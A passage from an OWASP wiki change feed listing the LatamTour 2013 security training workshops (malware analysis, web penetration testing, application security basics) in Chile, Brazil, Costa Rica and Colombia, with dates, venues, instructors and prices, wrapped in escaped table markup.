| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 11:45 - 12:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 12:15 - 12:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 12:45 - 14:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:00 - 14:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:45 - 15:30&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 15:30 - 16:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:15 - 16:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:45 - 17:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 17:45 - 18:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_Training&amp;diff=146967</id>
		<title>LatamTour2013 Training</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_Training&amp;diff=146967"/>
				<updated>2013-03-07T18:49:11Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''OWASP LATAM TOUR 2013''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | '''ENTRENAMIENTOS EN LATINOAMERICA''' &lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''CHILE-SANTIAGO'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Lunes 18 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Alonso de Ovalle 1586, Santiago Centro&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Noimagen.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Penetration Testing Web”'''&lt;br /&gt;
 &lt;br /&gt;
Scripting para Pentesting Web, desarrollo de casos reales de automatización de ataques, trabajo con sesiones, explotación de sql injection.&lt;br /&gt;
&lt;br /&gt;
Si alguna vez pensaste cuando estabas haciendo una Pentesting cómo no hay una herramienta para hacer esto, este es el curso que deseas participar! Este curso te explicará el protocolo HTTP, su estructura y cómo interactúa con los navegadores, y luego haremos una introducción al lenguaje de programación Python y explicar cómo se puede usar para interactuar con páginas, administrar sesiones, automatizar procesos, analizar el uso expresiones regulares y realizar comprobaciones basadas en la guía de pruebas de OWASP. Con todo este conocimiento adquirido, desarrollaremos pequeñas herramientas para necesidades específicas.&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador:''' Ricardo Supo&lt;br /&gt;
OWASP - Perú Chapter Colider&lt;br /&gt;
CTO at Consultoría LimaSoft SAC&lt;br /&gt;
CTO at INZAFE SAC&lt;br /&gt;
10+ años de experiencia en pentesting y desarrollo de software&lt;br /&gt;
 &lt;br /&gt;
'''Prerequisitos:'''&lt;br /&gt;
&lt;br /&gt;
El participante deberá llevar un computador con al menos 4 GB en RAM, 100GB en disco libre para máquinas virtuales y preinstalado VMWare Player.&lt;br /&gt;
&lt;br /&gt;
'''Duración:''' 4 horas (horario mañana 9AM-1PM)&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S95 No miembros / U$S45 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingpentest1 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Noimagen.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Penetration Testing Web”'''&lt;br /&gt;
 &lt;br /&gt;
Scripting para Pentesting Web, desarrollo de casos reales de automatización de ataques, trabajo con sesiones, explotación de sql injection.&lt;br /&gt;
&lt;br /&gt;
Si alguna vez pensaste cuando estabas haciendo una Pentesting cómo no hay una herramienta para hacer esto, este es el curso que deseas participar! Este curso te explicará el protocolo HTTP, su estructura y cómo interactúa con los navegadores, y luego haremos una introducción al lenguaje de programación Python y explicar cómo se puede usar para interactuar con páginas, administrar sesiones, automatizar procesos, analizar el uso expresiones regulares y realizar comprobaciones basadas en la guía de pruebas de OWASP. Con todo este conocimiento adquirido, desarrollaremos pequeñas herramientas para necesidades específicas.&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador:''' Ricardo Supo&lt;br /&gt;
OWASP - Perú Chapter Colider&lt;br /&gt;
CTO at Consultoría LimaSoft SAC&lt;br /&gt;
CTO at INZAFE SAC&lt;br /&gt;
10+ años de experiencia en pentesting y desarrollo de software&lt;br /&gt;
 &lt;br /&gt;
'''Prerequisitos:'''&lt;br /&gt;
&lt;br /&gt;
El participante deberá llevar un computador con al menos 4 GB en RAM, 100GB en disco libre para máquinas virtuales y preinstalado VMWare Player.&lt;br /&gt;
&lt;br /&gt;
'''Duración:''' 4 horas (horario tarde 2PM-6PM)&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S95 No miembros / U$S45 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingpentest2 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''Brasil-Curitiba'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | 25 de Março&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Noimagen.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Introdução a segurança de aplicações'''&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Obtener el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
This training will help you will gain skills on how to assess applications from a hacker's point of view, understand application security vulnerabilities and learn how to close these security holes in your applications so they are never exploited by a hacker. This intensive one day course focuses on the most common web application security problems, including aspects of both the OWASP Top Ten (2010) and the MITRE Top 25.&lt;br /&gt;
&lt;br /&gt;
Hands on: The students will participate in a number of hands-on security testing exercises where they attack a live web application (i.e., WebGoat) that has been seeded with common web application vulnerabilities and then use proxy tools (i.e., Webscarab) to complete the exercises.&lt;br /&gt;
&lt;br /&gt;
Requisitos: Notebook/desktop com VMware/VMplayer instalado, pois será utilizada uma imagem de máquina virtual disponibilizada pelo instrutor.&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Estudantes e profissionais que desejam aprender mais sobre segurança em aplicações web.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Iniciante&lt;br /&gt;
&lt;br /&gt;
'''Perfil do Instrutor:''' Wagner Elias&lt;br /&gt;
&lt;br /&gt;
Wagner Elias tem ampla experiência na condução de projetos em IT Security com projetos desenvolvidos em empresas dos mais diversos segmentos. É fundador do capítulo brasileiro da OWASP (Open Web Application Security Project); ocupou o cargo de diretor de conteúdo na gestão 2006-2008 e de eventos da gestão 2008-2010 do capítulo brasileiro da ISSA (Information System Security Association). É co-fundador e sócio da Conviso Application Security, onde atua como CTO (Chief Technical Officer), responsável pela gestão de pesquisa e desenvolvimento de projetos de consultoria em segurança de aplicações.&lt;br /&gt;
&lt;br /&gt;
'''Duração:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Preço:''' U$S300 Não membros / U$S250 Membros OWASP. &lt;br /&gt;
&lt;br /&gt;
'''Para mais informações e preço''': [- Click aqui!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''COSTA RICA - SAN JOSE'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Lunes 18 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Fundación Omar Dengo - Barrio Francisco Peralta, Avenidas 10 y 12 - Calle 25 - San Jose &lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Noimagen.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Penetration Testing de Aplicaciones Web'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Las pruebas de intrusión a aplicaciones web son auditorías de seguridad en las que el penetration tester actúa como lo haría un posible atacante, pero con autorización; con el objetivo de analizar, encontrar y explotar vulnerabilidades de aplicaciones web corporativas.&lt;br /&gt;
El curso se basará en el OWASP Top 10 y en OWASP Testing Guide, como marcos de referencia para realizar todo el proceso de pentest de aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13sjotraining HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''BOGOTA - COLOMBIA'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Miercoles 20 de Marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Universidad Javeriana. Edificio Fernando Barón Sala 2-309&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13bogtrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
